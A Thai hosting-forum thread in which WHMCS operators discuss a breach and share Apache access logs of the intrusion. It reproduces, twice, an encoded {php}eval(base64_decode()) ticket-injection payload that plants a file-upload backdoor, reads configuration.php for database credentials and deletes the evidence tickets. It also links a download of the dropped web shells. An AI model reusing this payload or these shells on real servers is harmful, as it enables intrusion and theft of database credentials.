Whmcs ผมโดนดีเข้าแล้วหรอครับ

จากภาพ ครับ ผมได้ Ticket ข้อความแบบด้านล่าง บ่อยมากครับ



A new support ticket has been opened.



 Client: rea

Department: แจ้งปัญหา - Support

Subject:  {php}eval(base64_decode('JGMwZGUgID0gYmFzZTY0X2RlY29kZSgnUEQ5d2FIQU5DbWxtS0dsemMyVjBLQ1JmVUU5VFZGc25VM1ZpYldsMEoxMHBLWHNOQ2lBZ0lDQWtabWxzWldScGNpQTlJQ0lpT3lBTkNpQWdJQ0FrYldGNFptbHNaU0E5SUNjeU1EQXdNREF3SnpzTkNnMEtJQ0FnSUNSMWMyVnlabWxzWlY5dVlXMWxJRDBnSkY5R1NVeEZVMXNuYVcxaFoyVW5YVnNuYm1GdFpTZGRPdzBLSUNBZ0lDUjFjMlZ5Wm1sc1pWOTBiWEFnUFNBa1gwWkpURVZUV3lkcGJXRm5aU2RkV3lkMGJYQmZibUZ0WlNkZE93MEtJQ0FnSUdsbUlDaHBjM05sZENna1gwWkpURVZUV3lkcGJXRm5aU2RkV3lkdVlXMWxKMTBwS1NCN0RRb2dJQ0FnSUNBZ0lDUmhZbTlrSUQwZ0pHWnBiR1ZrYVhJdUpIVnpaWEptYVd4bFgyNWhiV1U3RFFvZ0lDQWdJQ0FnSUVCdGIzWmxYM1Z3Ykc5aFpHVmtYMlpwYkdVb0pIVnpaWEptYVd4bFgzUnRjQ3dnSkdGaWIyUXBPdzBLSUNBTkNtVmphRzhpUEdObGJuUmxjajQ4WWo1RWIyNWxJRDA5UGlBa2RYTmxjbVpwYkdWZmJtRnRaVHd2WWo0OEwyTmxiblJsY2o0aU93MEtmUTBLZlEwS1pXeHpaWHNOQ21WamFHOG5EUW84Wm05eWJTQnRaWFJvYjJROUlsQlBVMVFpSUdGamRHbHZiajBpSWlCbGJtTjBlWEJsUFNKdGRXeDBhWEJoY25RdlptOXliUzFrWVhSaElqNDhhVzV3ZFhRZ2RIbHdaVDBpWm1sc1pTSWdibUZ0WlQwaWFXMWhaMlVpUGp4cGJuQjFkQ0IwZVhCbFBTSlRkV0p0YVhRaUlHNWhiV1U5SWxOMVltMXBkQ0lnZG1Gc2RXVTlJbE4xWW0xcGRDSStQQzltYjNKdFBpYzdEUXA5RFFvL1BpQT0nKTsNCg0KJGYwcDNuID0gZm9wZW4gKCd0ZW1wbGF0ZXNfYy9pbmRleHgucGhwJywnYScpOw0KDQokd3JpdCAgPSBmd3JpdGUoJGYwcDNuICwgJGMwZGUpOw0KDQppZiAoJHdyaXQpIHsNCiAgICBlY2hvICc8Y2VudGVyPjxiPjxmb250IGNvbG9yPXJlZCA+RG9uZSAuLi4gR28gPT4gZG93bmxvYWRzL2luZGV4eC5waHAgOyknOw0KICAgIGZjbG9zZSgkd3JpdCk7DQp9IGVsc2Ugew0KICAgIGVjaG8gJ0Vycm9yICEhJzsNCn0NCiR0ZXh0PWZpbGVfZ2V0X2NvbnRlbnRzKCJjb25maWd1cmF0aW9uLnBocCIpOw0KJHRleHQ9IHN0cl9yZXBsYWNlKCI8P3BocCIsICIiLCAkdGV4dCk7DQokdGV4dD0gc3RyX3JlcGxhY2UoIjw/IiwgIiIsICR0ZXh0KTsNCiR0ZXh0PSBzdHJfcmVwbGFjZSgiPz4iLCAiIiwgJHRleHQpOw0KZXZhbCgkdGV4dCk7DQokZGI9bXlzcWxfY29ubmVjdCgkZGJfaG9zdCwkZGJfdXNlcm5hbWUsJGRiX3Bhc3N3b3JkKSBvciBkaWUoIkNhbid0IG9wZW4gY29ubmVjdGlvbiB0byBNeVNRTCIpOw0KbXlzcWxfc2VsZWN0X2RiKCRkYl9uYW1lKSBvciBkaWUoIkNhbid0IHNlbGVjdCBkYXRhYmFzZSIpOw0KJGRlbGV0ZSA9IkRFTEVURSBmcm9tIHRibHRpY2tldHMgV0hFUkUgdGl0bGUgbGlrZSAweDI1N0I3MDY4NzA3RDI1OyI7DQpteXNxbF9xdWVyeSgkZGVsZXRlKTs='));{/php}

Priority: Medium



 ---

{php}eval(base64_decode('JGMwZGUgID0gYmFzZTY0X2RlY29kZSgnUEQ5d2FIQU5DbWxtS0dsemMyVjBLQ1JmVUU5VFZGc25VM1ZpYldsMEoxMHBLWHNOQ2lBZ0lDQWtabWxzWldScGNpQTlJQ0lpT3lBTkNpQWdJQ0FrYldGNFptbHNaU0E5SUNjeU1EQXdNREF3SnpzTkNnMEtJQ0FnSUNSMWMyVnlabWxzWlY5dVlXMWxJRDBnSkY5R1NVeEZVMXNuYVcxaFoyVW5YVnNuYm1GdFpTZGRPdzBLSUNBZ0lDUjFjMlZ5Wm1sc1pWOTBiWEFnUFNBa1gwWkpURVZUV3lkcGJXRm5aU2RkV3lkMGJYQmZibUZ0WlNkZE93MEtJQ0FnSUdsbUlDaHBjM05sZENna1gwWkpURVZUV3lkcGJXRm5aU2RkV3lkdVlXMWxKMTBwS1NCN0RRb2dJQ0FnSUNBZ0lDUmhZbTlrSUQwZ0pHWnBiR1ZrYVhJdUpIVnpaWEptYVd4bFgyNWhiV1U3RFFvZ0lDQWdJQ0FnSUVCdGIzWmxYM1Z3Ykc5aFpHVmtYMlpwYkdVb0pIVnpaWEptYVd4bFgzUnRjQ3dnSkdGaWIyUXBPdzBLSUNBTkNtVmphRzhpUEdObGJuUmxjajQ4WWo1RWIyNWxJRDA5UGlBa2RYTmxjbVpwYkdWZmJtRnRaVHd2WWo0OEwyTmxiblJsY2o0aU93MEtmUTBLZlEwS1pXeHpaWHNOQ21WamFHOG5EUW84Wm05eWJTQnRaWFJvYjJROUlsQlBVMVFpSUdGamRHbHZiajBpSWlCbGJtTjBlWEJsUFNKdGRXeDBhWEJoY25RdlptOXliUzFrWVhSaElqNDhhVzV3ZFhRZ2RIbHdaVDBpWm1sc1pTSWdibUZ0WlQwaWFXMWhaMlVpUGp4cGJuQjFkQ0IwZVhCbFBTSlRkV0p0YVhRaUlHNWhiV1U5SWxOMVltMXBkQ0lnZG1Gc2RXVTlJbE4xWW0xcGRDSStQQzltYjNKdFBpYzdEUXA5RFFvL1BpQT0nKTsNCg0KJGYwcDNuID0gZm9wZW4gKCd0ZW1wbGF0ZXNfYy9pbmRleHgucGhwJywnYScpOw0KDQokd3JpdCAgPSBmd3JpdGUoJGYwcDNuICwgJGMwZGUpOw0KDQppZiAoJHdyaXQpIHsNCiAgICBlY2hvICc8Y2VudGVyPjxiPjxmb250IGNvbG9yPXJlZCA+RG9uZSAuLi4gR28gPT4gZG93bmxvYWRzL2luZGV4eC5waHAgOyknOw0KICAgIGZjbG9zZSgkd3JpdCk7DQp9IGVsc2Ugew0KICAgIGVjaG8gJ0Vycm9yICEhJzsNCn0NCiR0ZXh0PWZpbGVfZ2V0X2NvbnRlbnRzKCJjb25maWd1cmF0aW9uLnBocCIpOw0KJHRleHQ9IHN0cl9yZXBsYWNlKCI8P3BocCIsICIiLCAkdGV4dCk7DQokdGV4dD0gc3RyX3JlcGxhY2UoIjw/IiwgIiIsICR0ZXh0KTsNCiR0ZXh0PSBzdHJfcmVwbGFjZSgiPz4iLCAiIiwgJHRleHQpOw0KZXZhbCgkdGV4dCk7DQokZGI9bXlzcWxfY29ubmVjdCgkZGJfaG9zdCwkZGJfdXNlcm5hbWUsJGRiX3Bhc3N3b3JkKSBvciBkaWUoIkNhbid0IG9wZW4gY29ubmVjdGlvbiB0byBNeVNRTCIpOw0KbXlzcWxfc2VsZWN0X2RiKCRkYl9uYW1lKSBvciBkaWUoIkNhbid0IHNlbGVjdCBkYXRhYmFzZSIpOw0KJGRlbGV0ZSA9IkRFTEVURSBmcm9tIHRibHRpY2tldHMgV0hFUkUgdGl0bGUgbGlrZSAweDI1N0I3MDY4NzA3RDI1OyI7DQpteXNxbF9xdWVyeSgkZGVsZXRlKTs='));{/php}



----------------------------

IP Address: 78.177.228.160

---



 You can respond to this ticket by simply replying to this email or through the admin area at the url below.






ถ้าอัพเดตล่าสุด หรือ Patch แล้วก็ไม่น่าห่วงอะไรครับ…แต่ถ้ายังล่ะก็

ตอนนี้เอาไฟล์มาให้ดูครับ อยู่ๆ เข้าไปอยู่ที่ template_c ครับ

indexx.php

joomla.php

web.php

[url=“http://www.mediafire.com/?k9sxnslqypfuuwt”]

แย่จังครับ ไล่เปลี่ยน pass ซะ มึนหัวเลย ทั้งป่วย

คนแฮ็ก [b][color=#F200FF][b]h4CkeR

เก่งจังนะครับ นับถือ

[/b][/color][/b]

ไม่มีคนตอบเลย แต่ผม ลองรันไฟล์ web.php แนะนำให้พี่ๆ เจ้าของโฮส รีบๆ ค้นดูนะครับ

สุดยอดมาก เอาเข้ามาได้ยังไง กัน ไม่เคยเห็นเลยครับ

โดน back door ครับ ผมก็เคยโดน อัพเดรตแล้วไล่เปลี่ยนพาสทั้งหมดเลยคัรบ ลองเข้าไปฟอรั่มดู

อย่าลืมอัพให้เป็นตัวล่าสุด หรือไปโหลด patch มาด้วยละครับ เดี่ยวจะโดนอีก

ตอนนี้ เอา log มาให้ดูครับ เคร้าจริง แต่ละไฟล์ที่เ้ค้าเอามามัน manage ได้เลย จบเลย



78.177.228.160 - - [22/Jan/2012:18:11:17 +0700] "GET /submitticket.php?step=2&deptid=2 HTTP/1.1" 200 3187 "http://www.google.com.tr/url?sa=t&rct=j&q=inurl%3Asubmitticket.php%20%E0%B9%81%E0%B8%81&source=web&cd=55&ved=0CD0QFjAEODI&url=http%3A%2F%2Fclient.tzi.net%2Fsubmitticket.php%3Fstep%3D2%26deptid%3D2&ei=9esbT6fCKc6DtQbQg6xH&usg=AFQjCNHH_7n3_jwHc__6M_aHIcmymUKZ0A&cad=rja" "Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1"

78.177.228.160 - - [22/Jan/2012:18:11:18 +0700] "GET /templates/portal/style.css HTTP/1.1" 200 1810 "http://client.tzi.net/submitticket.php?step=2&deptid=2" "Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1"

78.177.228.160 - - [22/Jan/2012:18:11:19 +0700] "GET /templates/portal/images/icons/support.gif HTTP/1.1" 200 1339 "http://client.tzi.net/submitticket.php?step=2&deptid=2" "Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1"

78.177.228.160 - - [22/Jan/2012:18:11:19 +0700] "GET /images/add.gif HTTP/1.1" 200 864 "http://client.tzi.net/submitticket.php?step=2&deptid=2" "Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1"

78.177.228.160 - - [22/Jan/2012:18:11:19 +0700] "GET /includes/verifyimage.php HTTP/1.1" 200 2122 "http://client.tzi.net/submitticket.php?step=2&deptid=2" "Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1"

78.177.228.160 - - [22/Jan/2012:18:11:19 +0700] "GET /templates/portal/images/icons/star.png HTTP/1.1" 200 711 "http://client.tzi.net/submitticket.php?step=2&deptid=2" "Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1"

78.177.228.160 - - [22/Jan/2012:18:11:20 +0700] "GET /templates/portal/images/icons/clientarea.gif HTTP/1.1" 200 1333 "http://client.tzi.net/submitticket.php?step=2&deptid=2" "Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1"

78.177.228.160 - - [22/Jan/2012:18:11:20 +0700] "GET /templates/portal/images/icons/announcement.gif HTTP/1.1" 200 911 "http://client.tzi.net/submitticket.php?step=2&deptid=2" "Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1"

78.177.228.160 - - [22/Jan/2012:18:11:20 +0700] "GET /templates/portal/images/icons/knowledgebase.gif HTTP/1.1" 200 1312 "http://client.tzi.net/submitticket.php?step=2&deptid=2" "Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1"

78.177.228.160 - - [22/Jan/2012:18:11:20 +0700] "GET /templates/portal/images/icons/submit-ticket.gif HTTP/1.1" 200 1338 "http://client.tzi.net/submitticket.php?step=2&deptid=2" "Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1"

78.177.228.160 - - [22/Jan/2012:18:11:20 +0700] "GET /templates/portal/images/icons/downloads.gif HTTP/1.1" 200 1335 "http://client.tzi.net/submitticket.php?step=2&deptid=2" "Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1"

78.177.228.160 - - [22/Jan/2012:18:11:21 +0700] "GET /templates/portal/images/icons/order.gif HTTP/1.1" 200 1329 "http://client.tzi.net/submitticket.php?step=2&deptid=2" "Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1"

78.177.228.160 - - [22/Jan/2012:18:11:20 +0700] "GET /includes/jscript/jquery.js HTTP/1.1" 200 20091 "http://client.tzi.net/submitticket.php?step=2&deptid=2" "Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1"

78.177.228.160 - - [22/Jan/2012:18:11:23 +0700] "GET /templates/portal/images/bg_background.gif HTTP/1.1" 200 714 "http://client.tzi.net/templates/portal/style.css" "Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1"

78.177.228.160 - - [22/Jan/2012:18:11:23 +0700] "GET /templates/portal/images/content_container_bg.gif HTTP/1.1" 200 365 "http://client.tzi.net/templates/portal/style.css" "Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1"

78.177.228.160 - - [22/Jan/2012:18:11:24 +0700] "GET /favicon.ico HTTP/1.1" 404 602 "-" "Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1"

78.177.228.160 - - [22/Jan/2012:18:11:33 +0700] "POST /submitticket.php HTTP/1.1" 200 437 "http://client.tzi.net/submitticket.php?step=2&deptid=2" "Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1"

78.177.228.160 - - [22/Jan/2012:18:11:36 +0700] "POST /submitticket.php?step=3 HTTP/1.1" 302 475 "http://client.tzi.net/submitticket.php?step=2&deptid=2" "Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1"

78.177.228.160 - - [22/Jan/2012:18:11:38 +0700] "GET /submitticket.php?step=4 HTTP/1.1" 200 2262 "http://client.tzi.net/submitticket.php?step=2&deptid=2" "Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1"

78.177.228.160 - - [22/Jan/2012:18:12:04 +0700] "GET //templates_c/indexx.php HTTP/1.1" 200 393 "-" "Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1"

78.177.228.160 - - [22/Jan/2012:18:12:14 +0700] "POST //templates_c/indexx.php HTTP/1.1" 200 350 "http://client.tzi.net//templates_c/indexx.php" "Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1"

78.177.228.160 - - [22/Jan/2012:18:13:28 +0700] "GET //templates_c/joomla.php HTTP/1.1" 200 8910 "-" "Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1"

78.177.228.160 - - [22/Jan/2012:18:13:36 +0700] "POST //templates_c/joomla.php HTTP/1.1" 200 6663 "http://client.tzi.net//templates_c/joomla.php" "Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1"




http://www.google.com.tr/url?sa=t&rct=j&q=inurl%3Asubmitticket.php%20%E0%B9%81%E0%B8%81&source=web&cd=55&ved=0CD0QFjAEODI&url=http%3A%2F%2Fclient.tzi.net%2Fsubmitticket.php%3Fstep%3D2%26deptid%3D2&ei=9esbT6fCKc6DtQbQg6xH&usg=AFQjCNHH_7n3_jwHc__6M_aHIcmymUKZ0A&cad=rja


จุดเริ่มต้น

ปล. เว็บ tzi.net แค่ยกตัวอย่างมานะครับ

มันเข้าไปเปลี่ยน DNS ผมได้แล้ว งง มาก โดเมนจดไว้ที่อื่นไม่ได้รวมกับที่ไหน ไม่ได้พ่วงไว้กับ whmcs ด้วย

โดเมนหลักถูกชี้มาไอพี

173.193.106.10

ขอบคุณที่เค้าไม่ย้ายหนี

แหม่ เช้านี้มีคนมาลองของที่เว็บผมด้วย คิดว่าคงเป็นคนใน THT นี่ล่ะ ข้อความใน Ticket เหมือนตัวอย่างในกระทู้เลย

IP True Internet บ้านใครหรอครับ แสดงตัวหน่อยสิ

ผมก็โดนครับ ตอนตีห้า IP True Internet เหมือนกัน อย่ามาลองบ่อยๆนะ รำคาร

ผมก็โดน ip เดียวกันเลยครับ 5555 ไอเราก็งง อุส่าเปิดให้เฉพาะ ip ไทยเท่านั้นที่เข้าได้ มาได้ไง ที่ไหนได้ ip จากไทยนี่เอง



58.11.162.232 - - [24/Jan/2012:04:38:02 +0700] "GET /submitticket.php HTTP/1.1" 200 2483 "http://www.google.co.th/url?sa=t&rct=j&q=inurl:submitticket.php&source=web&cd=54&ved=0CDcQFjADODI&url=http%3A%2F%2Fmydomain.com%2Fsubmitticket.php&ei=39IdT62xI8XorAfU75mSDA&usg=AFQjCNH2dYjjIptHsLobEE5WWXEx4zwU5w&sig2=L7_TGinoljZUPifqUcj6fw" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)"

58.11.162.232 - - [24/Jan/2012:04:38:04 +0700] "GET /templates/default/css/bootstrap.css HTTP/1.1" 200 13727 "http://mydomain.com/submitticket.php" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)"

58.11.162.232 - - [24/Jan/2012:04:38:04 +0700] "GET /templates/default/css/whmcs.css HTTP/1.1" 200 5486 "http://mydomain.com/submitticket.php" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)"

58.11.162.232 - - [24/Jan/2012:04:38:04 +0700] "GET /includes/jscript/jquery.js HTTP/1.1" 200 36233 "http://mydomain.com/submitticket.php" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)"

58.11.162.232 - - [24/Jan/2012:04:38:04 +0700] "GET /templates/default/js/whmcs.js HTTP/1.1" 200 1950 "http://mydomain.com/submitticket.php" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)"

58.11.162.232 - - [24/Jan/2012:04:38:06 +0700] "GET /images/emails.gif HTTP/1.1" 200 1524 "http://mydomain.com/submitticket.php" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)"

58.11.162.232 - - [24/Jan/2012:04:38:06 +0700] "GET /templates/default/img/whmcslogo.png HTTP/1.1" 200 21353 "http://mydomain.com/submitticket.php" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)"

58.11.162.232 - - [24/Jan/2012:04:38:09 +0700] "GET /templates/default/img/fa-icon.png HTTP/1.1" 200 4059 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)"

58.11.162.232 - - [24/Jan/2012:04:38:58 +0700] "GET /submitticket.php?step=2&deptid=2 HTTP/1.1" 200 3230 "http://mydomain.com/submitticket.php" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)"

58.11.162.232 - - [24/Jan/2012:04:38:58 +0700] "GET /includes/jscript/jquery.js HTTP/1.1" 304 415 "https://mydomain.com/submitticket.php?step=2&deptid=2" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)"

58.11.162.232 - - [24/Jan/2012:04:38:58 +0700] "GET /templates/default/css/bootstrap.css HTTP/1.1" 304 415 "https://mydomain.com/submitticket.php?step=2&deptid=2" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)"

58.11.162.232 - - [24/Jan/2012:04:38:59 +0700] "GET /templates/default/css/whmcs.css HTTP/1.1" 304 415 "https://mydomain.com/submitticket.php?step=2&deptid=2" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)"

58.11.162.232 - - [24/Jan/2012:04:38:59 +0700] "GET /templates/default/js/whmcs.js HTTP/1.1" 304 415 "https://mydomain.com/submitticket.php?step=2&deptid=2" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)"

58.11.162.232 - - [24/Jan/2012:04:39:00 +0700] "GET /templates/default/img/whmcslogo.png HTTP/1.1" 304 383 "https://mydomain.com/submitticket.php?step=2&deptid=2" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)"

58.11.162.232 - - [24/Jan/2012:04:39:00 +0700] "GET /images/add.gif HTTP/1.1" 200 1092 "https://mydomain.com/submitticket.php?step=2&deptid=2" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)"

58.11.162.232 - - [24/Jan/2012:04:39:00 +0700] "GET /includes/verifyimage.php HTTP/1.1" 200 2430 "https://mydomain.com/submitticket.php?step=2&deptid=2" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)"

58.11.162.232 - - [24/Jan/2012:04:39:00 +0700] "GET /templates/default/img/fa-icon.png HTTP/1.1" 200 4260 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)"

58.11.162.232 - - [24/Jan/2012:04:39:30 +0700] "POST /submitticket.php HTTP/1.1" 200 734 "https://mydomain.com/submitticket.php?step=2&deptid=2" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)"

58.11.162.232 - - [24/Jan/2012:04:39:34 +0700] "POST /submitticket.php?step=3 HTTP/1.1" 302 766 "https://mydomain.com/submitticket.php?step=2&deptid=2" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)"

58.11.162.232 - - [24/Jan/2012:04:39:35 +0700] "GET /submitticket.php?step=4 HTTP/1.1" 200 2318 "https://mydomain.com/submitticket.php?step=2&deptid=2" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)"

58.11.162.232 - - [24/Jan/2012:04:39:36 +0700] "GET /templates/default/img/fa-icon.png HTTP/1.1" 200 4260 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)"

58.11.162.232 - - [24/Jan/2012:04:39:54 +0700] "GET /viewticket.php?tid=512837&c=u4tvdg7M HTTP/1.1" 200 4510 "https://mydomain.com/submitticket.php?step=4" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)"


คนที่มาอ่านในนี้หล่ะ

ผมก็โดน ไอพีเดียวกัน ขนาดไม่ค่อยเล่น THT น่ะ กระทู้นี้ก็ยังไม่ได้แสดงความเห็น

IP Address: 58.11.162.232

5:16:52 AM

ตอน 1:24 น. ที่ผ่านมา มาจาก ip 58.9.20.41 อีกแล้วครับ ^^



58.9.20.41 - - [25/Jan/2012:01:24:10 +0700] "GET /cart.php?a=add&pid=75 HTTP/1.1" 200 2712 "http://www.mydomain.com/web-hosting/linux-hosting/" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)"

58.9.20.41 - - [25/Jan/2012:01:24:10 +0700] "GET /includes/jscript/jquery.js HTTP/1.1" 200 36233 "http://mydomain.com/cart.php?a=add&pid=75" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)"

58.9.20.41 - - [25/Jan/2012:01:24:10 +0700] "GET /templates/default/css/bootstrap.css HTTP/1.1" 200 13727 "http://mydomain.com/cart.php?a=add&pid=75" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)"

58.9.20.41 - - [25/Jan/2012:01:24:10 +0700] "GET /templates/default/css/whmcs.css HTTP/1.1" 200 5486 "http://mydomain.com/cart.php?a=add&pid=75" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)"

58.9.20.41 - - [25/Jan/2012:01:24:10 +0700] "GET /templates/default/js/whmcs.js HTTP/1.1" 200 1950 "http://mydomain.com/cart.php?a=add&pid=75" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)"

58.9.20.41 - - [25/Jan/2012:01:24:10 +0700] "GET /templates/orderforms/cart/style.css HTTP/1.1" 200 1278 "http://mydomain.com/cart.php?a=add&pid=75" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)"

58.9.20.41 - - [25/Jan/2012:01:24:11 +0700] "GET /templates/default/img/whmcslogo.png HTTP/1.1" 200 21353 "http://mydomain.com/cart.php?a=add&pid=75" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)"

58.9.20.41 - - [25/Jan/2012:01:24:14 +0700] "GET /templates/default/img/fa-icon.png HTTP/1.1" 200 4059 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)"

58.9.20.41 - - [25/Jan/2012:01:24:40 +0700] "GET /submitticket.php HTTP/1.1" 200 2419 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)"

